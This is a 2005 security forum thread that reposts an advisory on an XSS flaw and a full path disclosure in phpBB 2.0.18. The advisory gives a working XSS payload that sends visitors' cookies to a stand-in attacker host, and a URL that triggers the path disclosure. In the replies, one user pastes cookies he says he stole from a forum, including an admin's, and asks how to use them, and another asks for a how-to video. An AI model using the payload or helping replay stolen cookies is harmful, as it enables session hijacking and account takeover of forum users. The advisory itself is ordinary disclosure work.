| 
  
        |  |  |  
      
        |  |  
  | 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 295 
  Members: 0 
  Total: 295 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  
     
     | 
      
       | 
        
         | 
          
           | CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
 Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
 Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
 Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
 [SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
 [SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
 CVE-2025-59397 - Open Web Analytics SQL Injection
 Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
 Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
 Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
 Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
 Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
 Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
 Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
 
 |  |  |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | phpBB 2.0.18 XSS and Full Path Disclosure and lower |  |  
	| 
	
		|  Posted: Mon Dec 19, 2005 5:53 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| diegocure15 |  | Active user |  |  
  |  |  |  | Joined: Sep 22, 2004 |  | Posts: 27 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Credit : Maksymilian Arciemowicz 
 Date : 17.12.2005
 
 Affected Software :  phpBB <= 2.0.18
 
 Advisory Text :
 
 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 
 [phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
 
 Author: Maksymilian Arciemowicz (cXIb8O3)
 Date: 16.12.2005
 from securityreason.com TEAM
 
 - --- 0.Description ---
 phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar
 d package. phpBB has a user-friendly interface, simple and straightforward administration
 panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
 , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so
 lution for all web sites.
 Contact with author http://www.phpbb.com/about.php.
 
 - --- 1. XSS ---
 If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al
 low HTML: YES" or are you Guest
 
 that you can use this tags:
 
 <B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>
 
 Exploit:
 
 <B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)
 " X="<B "> H A L O </B>
 
 and have you cookies.
 
 - --- 2. Full Path Disclosure ---
 In file admin/admin_disallow.php is
 
 - -25-31---
 if( !empty($setmodules) )
 {
 $filename = basename(__FILE__);
 $module['Users']['Disallow'] = append_sid($filename);
 
 return;
 }
 - -25-31---
 
 function append_sid() dosen't exists. And if you have:
 
 register_globals = On
 display_errors = On
 
 Try to go:
 http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
 
 - -RESULT ERROR---
 Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa
 llow.php on line 28
 - -RESULT ERROR---
 
 - --- 3. Greets ---
 sp3x
 
 - --- 4.Contact ---
 Author: Maksymilian Arciemowicz < cXIb8O3 >
 Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
 GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
 securityreason.com TEAM
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.4.2 (FreeBSD)
 
 iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
 /0u14EN2sQAh1Bwu0yvT48Q=
 =lsL8
 -----END PGP SIGNATURE-----
 
 
 Original source http://securityreason.com/securityalert/269
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Tue Dec 20, 2005 6:09 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| robin1200 |  | Regular user |  |  
  |  |  |  | Joined: Sep 13, 2005 |  | Posts: 19 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Exploit works...only problem is that I can only see my own cookie... 
  |  |  
		|  |  |  
	|  |  
	|  | i Have sucessfully exploited |  |  
	| 
	
		|  Posted: Wed Dec 21, 2005 4:04 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| ctf |  | Beginner |  |  
  |  |  |  | Joined: Dec 21, 2005 |  | Posts: 2 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| i have sucessfully exploited and i have some cookies with me one of them is admins and i want to know how can it be used ? 
 
 the cookie is
 
 phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:2:\"16\";}; phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}; phpbb2mysql_sid=d78d343d22d2871efec69f65854179db; phpbb2mysql_t=a:7:{i:2;i:1135074105;i:191;i:1135062519;i:33;i:1135053718;i:95;i:1135054130;i:89;i:1135062766;i:206;i:1135062837;i:247;i:1135072242;}
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Wed Dec 21, 2005 8:31 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| super |  | Active user |  |  
  |  |  |  | Joined: Sep 19, 2005 |  | Posts: 30 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| how do you use this exploit?? can you give me video clip about it.  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sat Dec 31, 2005 1:13 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| WaterBird |  | Active user |  |  
  |  |  |  | Joined: May 16, 2005 |  | Posts: 37 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Wate of time because "If in phpbb is Allowed HTML tags "ON"". I know the phpbb forums have HTML tags off after instalation, and there is not mutch forums that have html tags on. |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> PhpBB 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |  |